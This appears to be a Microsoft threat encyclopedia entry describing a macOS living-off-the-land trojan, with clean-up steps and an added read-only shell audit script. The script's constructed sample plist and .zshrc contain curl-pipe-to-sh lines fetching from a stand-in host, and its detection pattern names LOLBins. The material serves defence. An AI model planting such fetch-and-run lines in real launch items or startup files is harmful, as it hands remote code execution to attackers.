Trojan:MacOS/SuspMalScript.C
Aliases: No associated aliases
Summary
Trojan:MacOS/SuspMalScript.C is a sophisticated malicious script that targets macOS by leveraging built-in administrative tools and scripting interpreters. SuspMalScript is characterized by its "living-off-the-land" (LOLBin) approach: it uses macOS utilities such as curl, osascript, launchctl, and openssl to perform unauthorized actions. By avoiding traditional Mach-O binaries in its initial stages, it reduces its visibility to signature-based antivirus engines.
The primary objective of SuspMalScript.C is the installation of persistent backdoors or the delivery of secondary payloads. These payloads are used to hijack web browser sessions, inject unauthorized advertisements, and exfiltrate sensitive user data, including browser history and keychain items. The trojan is often distributed through social engineering, where users are prompted to download and launch what appears to be a legitimate software update, most commonly a fake Adobe Flash Player installer or a "codec" required to view premium video content.
The impact of an infection is multi-layered. Beyond the immediate performance degradation caused by high-intensity background scripts, it compromises the integrity of the user's web browsing experience and creates a foothold for more damaging attacks, such as ransomware or credential harvesting. The modular nature of the script allows the threat actors to update the command-and-control (C2) infrastructure and payload URLs dynamically, making the threat highly resilient to static blocking measures.
- Disconnect the affected Mac from the internet to stop data exfiltration and prevent further commands from being received.
- Restart the Mac in Safe Mode to deactivate automatic loading of user-installed LaunchAgents and break the malware persistence cycle.
- Delete persistence files. Open Terminal and carefully inspect ~/Library/LaunchAgents, /Library/LaunchAgents, and /Library/LaunchDaemons for suspicious .plist files. Use the command launchctl unload /path/to/file.plist before deleting the file.
- Check and clean device configuration files. Examine the /etc/hosts file for malicious redirects and review shell startup files (.bash_profile, .zshrc) for injected commands.
- Reset privacy permissions using the Terminal command tccutil reset All. Be aware this will require you to re-grant access to legitimate applications for features like screen recording.
- Use a reputable, updated macOS security tool to perform a full system scan and remove any remaining payloads or artifacts that manual cleaning might have missed.
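The manual inspection steps above (launch items, /etc/hosts, shell startup files) can be turned into a read-only audit. The script below is an added example, not code from the Microsoft page or from Microsoft Defender: it lists the items a responder should look at first, flagging launch items and startup-file lines that call the utilities the description names (curl, osascript, launchctl, openssl) or pipe fetched content into a shell, and /etc/hosts entries beyond the stock macOS ones. It changes nothing on the system. The plists, hosts file and .zshrc it scans are constructed sample data written to a temporary directory so the script runs offline; on a real Mac, point the functions at ~/Library/LaunchAgents, /Library/LaunchAgents, /Library/LaunchDaemons, /etc/hosts and the user's .zshrc/.bash_profile instead.

```shell
#!/bin/sh
# Added example (not from the Microsoft page): read-only audit of the locations
# the clean-up steps name. Sample files below are CONSTRUCTED test data; the
# domain updates.example.invalid and the labels com.example.* are fictitious.

# Utilities named in the description, plus the "pipe into a shell" idiom that
# usually accompanies them in a malicious launch item or startup file.
LOL_PATTERN='curl|osascript|openssl|launchctl|base64|[|] *(sh|bash|zsh)( |$)'

# Print every .plist in DIR whose contents match LOL_PATTERN.
scan_launch_dir() {
    dir="$1"
    [ -d "$dir" ] || return 0
    for plist in "$dir"/*.plist; do
        [ -f "$plist" ] || continue
        grep -Eq "$LOL_PATTERN" "$plist" && printf '%s\n' "$plist"
    done
    return 0
}

# Print hosts-file entries beyond the three stock macOS lines
# (127.0.0.1 localhost, 255.255.255.255 broadcasthost, ::1 localhost).
# Anything else was added later and deserves inspection.
hosts_nonstandard() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" \
      | grep -Ev '^(127\.0\.0\.1|::1|255\.255\.255\.255)[[:space:]]+(localhost|broadcasthost)[[:space:]]*$'
    return 0
}

# Print numbered lines of a shell startup file that match LOL_PATTERN.
# Expect some false positives (e.g. completion scripts); the list is a
# starting point for review, not a verdict.
startup_injections() {
    [ -f "$1" ] || return 0
    grep -En "$LOL_PATTERN" "$1"
    return 0
}

# ---- constructed sample data -------------------------------------------
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
mkdir -p "$SAMPLE_DIR/LaunchAgents"

# Constructed: a benign LaunchAgent that runs a local backup script.
cat > "$SAMPLE_DIR/LaunchAgents/com.example.backup.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/backup.sh</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
EOF

# Constructed: the shape of a living-off-the-land launch item, a shell
# one-liner that fetches a remote script with curl and feeds it to sh.
cat > "$SAMPLE_DIR/LaunchAgents/com.example.updater.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL http://updates.example.invalid/u | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
EOF

# Constructed hosts file: stock entries plus one added redirect to localhost.
cat > "$SAMPLE_DIR/hosts" <<'EOF'
##
# Host Database
##
127.0.0.1       localhost
255.255.255.255 broadcasthost
::1             localhost
127.0.0.1       security-updates.example.invalid
EOF

# Constructed .zshrc: ordinary lines plus one injected fetch-and-run line.
cat > "$SAMPLE_DIR/.zshrc" <<'EOF'
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
curl -s http://updates.example.invalid/s | sh
EOF

# ---- report -------------------------------------------------------------
echo "== launch items calling LOLBins =="
scan_launch_dir "$SAMPLE_DIR/LaunchAgents"
echo "== non-stock hosts entries =="
hosts_nonstandard "$SAMPLE_DIR/hosts"
echo "== startup-file lines to inspect =="
startup_injections "$SAMPLE_DIR/.zshrc"
```

Flagged launch items should be unloaded with launchctl before the .plist is deleted, as the steps above say; the script deliberately stops at reporting so that nothing is removed before a responder has looked at the ProgramArguments and the files they reference.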
Microsoft Defender Antivirus automatically removes threats as they are detected. However, many infections can leave remnant files and system changes. Updating your antimalware definitions and running a full scan might help address these remnant artifacts.
You can also visit our advanced troubleshooting page or search the Microsoft virus and malware community for more help.